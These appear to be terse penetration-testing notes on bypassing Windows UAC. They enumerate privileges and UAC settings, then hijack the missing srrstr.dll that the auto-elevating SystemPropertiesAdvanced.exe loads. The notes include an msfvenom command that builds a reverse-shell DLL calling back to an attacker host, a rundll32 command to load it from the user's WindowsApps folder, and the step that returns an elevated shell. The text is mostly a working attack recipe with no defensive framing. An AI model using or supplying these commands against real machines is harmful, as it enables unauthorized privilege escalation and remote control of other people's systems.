Check current user with whoami /user
Check admin group membership: net localgroup administrators
Check privileges: whoami /priv
Check if UAC is enabled:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
0x1 is enabled.
Check UAC level:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
If its is 0x5 then Always notify is enabled
Check windows version with powershell:
[environment]::OSVersion.Version
Then cross-reference with this page
Then check UACME.
Here trying technique 54:
This technique targets the 32-bit version of the auto-elevating binary SystemPropertiesAdvanced.exe.
It tries to load a non-existent dll srrstr.dll
It follows the following search order:
- The directory from which the application loaded.
- The system directory C:\Windows\System32 for 64-bit systems.
- The 16-bit system directory C:\Windows\System (not supported on 64-bit systems)
- The Windows directory.
- Any directories that are listed in the PATH environment variable.
Check path:
cmd /c echo %PATH%
Then we can place a malicious srrstr.dll DLL to WindowsApps folder.
Malicious srrstr.dll
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f dll > srrstr.dll
Now running the dll we get a normal reverse shell back:
rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll
To get privileged shell back run: C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe We get a reverse shell back.